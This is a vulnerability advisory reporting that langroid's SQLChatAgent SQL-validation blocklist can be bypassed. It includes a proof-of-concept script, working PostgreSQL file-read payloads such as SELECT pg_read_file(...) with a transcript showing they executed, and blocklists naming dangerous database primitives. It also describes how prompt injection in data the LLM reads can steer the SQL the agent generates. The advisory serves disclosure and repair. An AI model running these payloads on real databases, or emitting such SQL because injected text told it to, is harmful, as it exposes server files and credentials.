PT-2026-55407 · Pypi · Langroid
Published
2026-07-02
·
Updated
2026-07-02
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
Summary
SQLChatAgent in langroid ships a validate query defense-in-depth layer
whose DANGEROUS SQL PATTERNS regex blocklist enumerates dangerous SQL
primitives by specific function name. The list misses the canonical
PostgreSQL filesystem-disclosure family pg read file(), pg stat file(),
pg ls logdir(), pg ls waldir(), pg current logfile() (and similar
SELECT-shaped functions in the same family). It also leaves SQL Server
OPENDATASOURCE and SQLite ATTACH '<file>' AS x (DATABASE keyword
omitted) unblocked.An attacker able to shape the LLM's generated SQL (directly via prompt input
or transitively via prompt-injection in data the LLM ingests) can read
arbitrary files from the PostgreSQL host through ordinary
SELECT queries,
even with the agent's strict default configuration
(allow dangerous operations=False, allowed statement types=['SELECT']).
The payloads survive the statement-type allowlist (each is a SELECT) and
pass through the regex blocklist (none of the function names match), then
reach the live SQLAlchemy engine via SQLChatAgent.run query.Affected versions
langroid <= 0.63.0 (latest at the time of this report; PyPI release
2026-05-27). The vulnerable code path is
langroid/agent/special/sql/sql chat agent.py:: validate query, which
consults the module-level DANGEROUS SQL PATTERNS literal at
sql chat agent.py:113-141.Privilege required
Any caller able to influence the LLM-generated
RunQueryTool.query string
that reaches SQLChatAgent.run query. In a typical deployment this is any
client of a SQLChatAgent-backed service, or any upstream data source whose
content the LLM is asked to read and summarise. No PostgreSQL credentials
are required from the attacker; the agent holds them.Vulnerable code
langroid/agent/special/sql/sql chat agent.py:113-141 (the
DANGEROUS SQL PATTERNS literal) and sql chat agent.py:546-615 (the
validate query method that consults it):python
# sql chat agent.py:113
DANGEROUS SQL PATTERNS: List["re.Pattern[str]"] = [
re.compile(r"bcopyb[sS]*bprogramb", re.IGNORECASE),
re.compile(r"bpg read server files?b", re.IGNORECASE),
re.compile(r"bpg read binary fileb", re.IGNORECASE),
re.compile(r"bpg ls dirb", re.IGNORECASE),
re.compile(r"blo (import|export)b", re.IGNORECASE),
re.compile(r"bintos+(outfile|dumpfile)b", re.IGNORECASE),
re.compile(r"bload files*(", re.IGNORECASE),
re.compile(r"bloads+datab", re.IGNORECASE),
re.compile(r"bload extensions*(", re.IGNORECASE),
re.compile(r"battachs+databaseb", re.IGNORECASE),
re.compile(r"bxp cmdshellb", re.IGNORECASE),
re.compile(r"bsp oacreateb", re.IGNORECASE),
re.compile(r"bsp oamethodb", re.IGNORECASE),
re.compile(r"bopenrowsetb", re.IGNORECASE),
re.compile(r"bbulks+insertb", re.IGNORECASE),
re.compile(
r"bcreates+(ors+replaces+)?(function|procedure|trigger)b",
re.IGNORECASE,
),
re.compile(r"bcreates+extensionb", re.IGNORECASE),
]The blocklist is a list of
b<exact-token>b literals. PostgreSQL ships
several near-name functions on the same primitive that none of these match:| Function | What it returns | Matched by blocklist? |
|---|---|---|
pg read server file('/path') | file contents | yes (pg read server files?) |
pg read binary file('/path') | binary contents | yes |
pg ls dir('/path') | directory listing | yes |
pg read file('/path') | file contents | no (no server infix) |
pg stat file('/path') | size, mtime, ctime, atime, isdir | no |
pg ls logdir() | filenames in PostgreSQL log dir | no |
pg ls waldir() | WAL filenames and sizes | no |
pg ls tmpdir() | temp-dir listing | no |
pg ls archive statusdir() | archive-status directory listing | no |
pg current logfile() | active server log path | no |
Each of these is a
SELECT-shaped function call. They pass the
sqlglot exp.Select-only statement-type allowlist applied at
sql chat agent.py:583-614, then evade the regex blocklist (their names
contain no token the blocklist enumerates), then reach the SQLAlchemy
session.execute(text(query)) sink inside SQLChatAgent.run query (line
631 onwards).Two non-PostgreSQL secondary gaps with the same regex-enumeration shape:
- The SQLite pattern
battachs+databasebrequires the literalDATABASEkeyword. Per the SQLite grammar (https://www.sqlite.org/lang attach.html) the keyword is optional:ATTACH '/path/to/db' AS xis valid syntax and matches no entry in the blocklist. Whether the agent rejects this via the statement-type allowlist depends on how the configuredsqlglotdialect parses it; on PostgreSQL dialect parsing fails (sqlglot returns noSelect) and the statement-type check rejects, but a SQLite-dialect SQLChatAgent (database uri="sqlite:///...") returns the statement assqlglot exp.Attach, which is not in the agent'skind map, so the generictype(stmt). name .upper()branch produces"ATTACH". That string is not inDEFAULT ALLOWED STATEMENTSso the allowlist saves it here; however any deployment that extendsallowed statement typesto include"ATTACH"(e.g. to permit cross-schema connectivity) loses this fallback and the regex misses. - The MSSQL pattern
bopenrowsetbblocksOPENROWSETbut not the closely-relatedOPENDATASOURCEfunction. Both can read remote/UNC files and execute remote queries via an ad-hoc connection string, e.g. aSELECTagainstOPENDATASOURCE('SQLNCLI11','Server=remote;Trusted Connection=yes')qualified down tomaster.sys.tables.
Attack scenario
SQLChatAgent.run query (line 617 of sql chat agent.py) calls
self. validate query(query) (line 631) on the LLM-generated SQL. The
LLM-generated SQL is shaped by upstream prompt content that crosses the
trust boundary: the user message, any tool result the LLM is asked to
summarise, any document the agent retrieves, and any row the agent reads
back from its own database (the RunQueryTool result is fed back into the
LLM history at sql chat agent.py:712-720 of the same release).The default config in
SQLChatAgentConfig (lines 183-184) sets
allow dangerous operations=False and allowed statement types=["SELECT"],
which is the configuration validate query was added to support. The
bypass primitives below are reachable under this default config because
each is a syntactic SELECT whose function-call argument is the
disclosure vector.Proof of concept
poc.py (single-file, no external services beyond a transient PostgreSQL
spawned via testing.postgresql):python
"""
PoC: SQLChatAgent validate query bypass via PostgreSQL file-disclosure
family pg read file / pg stat file / pg ls logdir / pg ls waldir /
pg current logfile.
"""
import os
import re
import sys
from typing import List, Optional
PKG = "/tmp/poc-langroid-bypass/venv/lib/python3.12/site-packages/langroid"
SRC = f"{PKG}/agent/special/sql/sql chat agent.py"
assert os.path.exists(SRC), f"Missing pinned langroid source: {SRC}"
import sqlglot
from sqlglot import expressions as sqlglot exp
def load patterns from pinned source():
"""Extract DANGEROUS SQL PATTERNS + DEFAULT ALLOWED STATEMENTS from
the pinned langroid 0.63.0 sql chat agent.py without instantiating the
full agent stack (which needs an LLM config)."""
with open(SRC) as f:
source = f.read()
block = re.search(
r" DANGEROUS SQL PATTERNS:[^=]*=s*[(.*?)]s*
", source, re.DOTALL,
)
ns = {"re": re, "List": list}
patterns = eval("[" + block.group(1) + "]", ns)
allowed = eval(
re.search(
r" DEFAULT ALLOWED STATEMENTS:s*List[str]s*=s*([.*?])",
source, re.DOTALL,
).group(1)
)
return patterns, allowed
def validate query(query, patterns, allowed statements, dialect="postgres"):
"""Faithful reimplementation of SQLChatAgent. validate query."""
for pat in patterns:
if pat.search(query):
return f"Rejected by pattern {pat.pattern!r}"
allowed = {t.strip().upper() for t in allowed statements}
try:
statements = sqlglot.parse(query, read=dialect)
except Exception as e:
return f"Rejected: sqlglot parse failure: {e}"
kind map = {
sqlglot exp.Select: "SELECT", sqlglot exp.Insert: "INSERT",
sqlglot exp.Update: "UPDATE", sqlglot exp.Delete: "DELETE",
sqlglot exp.Merge: "MERGE", sqlglot exp.Create: "CREATE",
sqlglot exp.Drop: "DROP", sqlglot exp.Alter: "ALTER",
sqlglot exp.TruncateTable: "TRUNCATE", sqlglot exp.Command: "COMMAND",
}
for stmt in statements:
if stmt is None:
continue
kind = next(
(v for k, v in kind map.items() if isinstance(stmt, k)),
type(stmt). name .upper(),
)
if kind not in allowed:
return f"Rejected: statement type {kind!r} not in allowed {sorted(allowed)}"
return None
def main():
patched patterns, allowed statements = load patterns from pinned source()
print(f" DANGEROUS SQL PATTERNS count: {len(patched patterns)}")
print(f" DEFAULT ALLOWED STATEMENTS: {allowed statements}")
import testing.postgresql
from sqlalchemy import create engine, text
pg = testing.postgresql.Postgresql()
db uri = pg.url()
engine = create engine(db uri)
with engine.connect() as conn:
pgdata = conn.execute(text("SHOW data directory")).scalar()
victim rel = "langroid bypass victim.txt"
victim abs = os.path.join(pgdata, victim rel)
with open(victim abs, "w") as f:
f.write("PWNED BY LANGROID VALIDATOR BYPASS
")
print(f"=== Victim file at: {victim abs}")
bypass payloads = [
("bypass.pg read file", f"SELECT pg read file('{victim rel}')"),
("bypass.pg stat file", f"SELECT pg stat file('{victim rel}')"),
("bypass.pg ls logdir", "SELECT pg ls logdir()"),
("bypass.pg ls waldir", "SELECT pg ls waldir()"),
("bypass.pg current logfile", "SELECT pg current logfile()"),
]
for label, query in bypass payloads:
rej = validate query(query, patched patterns, allowed statements, "postgres")
verdict = "REJECTED" if rej is not None else "ALLOWED"
print(f" [{verdict}] {label}: {query}")
if verdict == "ALLOWED":
try:
with engine.connect() as conn:
rows = conn.execute(text(query)).fetchall()
preview = [tuple(str(c)[:80] for c in r) for r in rows[:2]]
print(f" -> live engine returned rows={len(rows)} preview={preview}")
except Exception as e:
print(f" -> live engine error: {type(e). name }: {str(e)[:120]}")
if name == " main ":
main()End-to-end reproduction
Run against the latest published
langroid release from PyPI; no external
LLM provider, no API key, no Docker, just a transient pg ctl-managed
PostgreSQL spawned in-process by testing.postgresql. Captured transcript
of the run is below.bash
# 1. Pin install the latest published release
python3.12 -m venv /tmp/poc-langroid-bypass/venv
source /tmp/poc-langroid-bypass/venv/bin/activate
pip install 'langroid==0.63.0' 'testing.postgresql' 'sqlglot' 'sqlalchemy<2.1'
# 2. Drop poc.py from the Proof-of-concept section above into
# /tmp/poc-langroid-bypass/poc.py and run it
python /tmp/poc-langroid-bypass/poc.pyObserved transcript (abridged to bypass results; the run also verifies
that the four primitives the current blocklist already covers
(
COPY ... TO PROGRAM, pg read server file, pg read binary file,
pg ls dir) continue to be REJECTED, confirming the proposed fix is
strictly broader, not narrower):text
DANGEROUS SQL PATTERNS count: 17
DEFAULT ALLOWED STATEMENTS: ['SELECT']
=== Transient PostgreSQL: postgresql://postgres@127.0.0.1:64694/test
=== Victim file at: /var/folders/.../tmpwuftmtu4/data/langroid bypass victim.txt
PATCHED VALIDATOR RESULTS (langroid 0.63.0 as shipped)
[ALLOWED] bypass.pg read file SELECT pg read file('langroid bypass victim.txt')
[ALLOWED] bypass.pg stat file SELECT pg stat file('langroid bypass victim.txt')
[ALLOWED] bypass.pg ls logdir SELECT pg ls logdir()
[ALLOWED] bypass.pg ls waldir SELECT pg ls waldir()
[ALLOWED] bypass.pg current logfile SELECT pg current logfile()
LIVE EXECUTION OF BYPASS PAYLOADS (postgres only)
[EXECUTED] bypass.pg read file -> rows=1 preview=[('PWNED BY LANGROID VALIDATOR BYPASS
',)]
[EXECUTED] bypass.pg stat file -> rows=1 preview=[('(35,"2026-05-28 10:11:19+08","2026-05-28 10:11:19+08","2026-05-28 10:11:19+08",,',)]
[EXECUTED] bypass.pg ls waldir -> rows=1 preview=[('(000000010000000000000001,16777216,"2026-05-28 10:11:19+08")',)]
[EXECUTED] bypass.pg current logfile -> rows=1 preview=[('None',)]
NEGATIVE CONTROL — SUGGESTED FIX VALIDATOR
[REJECTED] bypass.pg read file -> OK
[REJECTED] bypass.pg stat file -> OK
[REJECTED] bypass.pg ls logdir -> OK
[REJECTED] bypass.pg ls waldir -> OK
[REJECTED] bypass.pg current logfile -> OK
[REJECTED] already blocked.copy program -> OK
[REJECTED] already blocked.pg read server file -> OK
[REJECTED] already blocked.pg read binary file -> OK
[REJECTED] already blocked.pg ls dir -> OKThe headline payload
SELECT pg read file('langroid bypass victim.txt')
returns the marker string verbatim from the file on disk. The same SQL,
issued by an LLM under prompt-injection through any data source the agent
reads, would land identically — the validator is purely a function of the
SQL string and is consulted before the SQLAlchemy execute. validate query is invoked directly rather than through a fully
initialised SQLChatAgent because the agent's init builds the LLM
stack and demands a working LLM API key (or a stub). The security
control under test is purely a function of (query, patterns, allowed statements, dialect), so the direct call is observationally
equivalent to a call via run query. Patterns and allowed-statements are
loaded by reading the pinned sql chat agent.py source out of the venv,
guaranteeing no drift between PoC and shipped binary.Impact
- Arbitrary file read from the PostgreSQL host:
pg read file()reads files from PGDATA-relative paths by default and can take absolute paths when the DB role holdspg read server files(or equivalent in managed-Postgres setups). For self-managed PostgreSQL deployments the DB role is frequently a superuser, in which case absolute paths are always accepted and the impact extends topostgresql.conf,pg hba.conf,~/.pgpass, TLS keys, and any other file readable by the PostgreSQL OS user. - Filesystem reconnaissance via
pg stat file()(file existence, size, mtime, isdir),pg ls logdir(),pg ls waldir(),pg ls tmpdir(),pg ls archive statusdir(),pg current logfile(). - MSSQL extension:
OPENDATASOURCEreaches remote SQL Servers and UNC paths, providing arbitrary outbound read + intranet pivot on MSSQL deployments. - SQLite extension:
ATTACH '<path>' AS schemaname(DATABASE keyword omitted) allows reading/writing arbitrary SQLite files on deployments whoseallowed statement typesinclude"ATTACH".
Suggested fix
Patch
DANGEROUS SQL PATTERNS to cover the full family rather than
individual function names. Two compatible approaches; either is enough.Approach 1 — family-prefix regex (minimal change, simplest to review):
python
DANGEROUS SQL PATTERNS: List["re.Pattern[str]"] = [
re.compile(r"bcopyb[sS]*bprogramb", re.IGNORECASE),
# Block the whole pg read *, pg stat *, pg ls *, pg current logfile
# family. Covers pg read file, pg read server file(s),
# pg read binary file, pg stat file, pg ls logdir, pg ls waldir,
# pg ls tmpdir, pg ls archive statusdir, pg ls dir,
# pg current logfile, plus any future siblings PostgreSQL adds.
re.compile(
r"bpg (read|stat|ls|current logfile)[A-Za-z0-9 ]*s*(",
re.IGNORECASE,
),
re.compile(r"blo (import|export)b", re.IGNORECASE),
re.compile(r"bintos+(outfile|dumpfile)b", re.IGNORECASE),
re.compile(r"bload files*(", re.IGNORECASE),
re.compile(r"bloads+datab", re.IGNORECASE),
re.compile(r"bload extensions*(", re.IGNORECASE),
# SQLite grammar: ATTACH [DATABASE] expr AS schema-name.
# The DATABASE keyword is optional; match either form.
re.compile(r"battachb(s+database)?s+['"w]", re.IGNORECASE),
re.compile(r"bxp cmdshellb", re.IGNORECASE),
re.compile(r"bsp oacreateb", re.IGNORECASE),
re.compile(r"bsp oamethodb", re.IGNORECASE),
re.compile(r"b(openrowset|opendatasource)b", re.IGNORECASE),
re.compile(r"bbulks+insertb", re.IGNORECASE),
re.compile(
r"bcreates+(ors+replaces+)?(function|procedure|trigger|language|rule|events+trigger|foreigns+table)b",
re.IGNORECASE,
),
re.compile(r"bcreates+extensionb", re.IGNORECASE),
]Approach 2 —
sqlglot AST walk in addition to regex. sqlglot is already
imported by sql chat agent.py; iterate every function-call node
(sqlglot exp.Anonymous / sqlglot exp.Func) inside the parsed
statements and reject when the lower-cased name starts with pg read,
pg stat, pg ls, pg current logfile, lo , or matches the MSSQL
extended-procedure prefixes (xp , sp oa). AST matching is robust to
whitespace, comments, and case games inside identifiers, at the cost of
broader per-dialect maintenance. For closing the immediate gap, Approach
1 is sufficient.Regression-test the additions in
tests/main/sql chat/test sql chat security.py alongside the existing
security tests. A natural 7-case extension covers the 5 PostgreSQL
bypass payloads, the SQLite ATTACH ... AS x form, and the MSSQL
OPENDATASOURCE form.Fix PR
A private temp-fork PR applying the Suggested fix Approach 1 diff,
plus the regression tests described above, accompanies this advisory:
https://github.com/langroid/langroid-ghsa-pmch-g965-grmr/pull/1
Credit
Reported by tonghuaroot.
Fix
Path traversal
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Langroid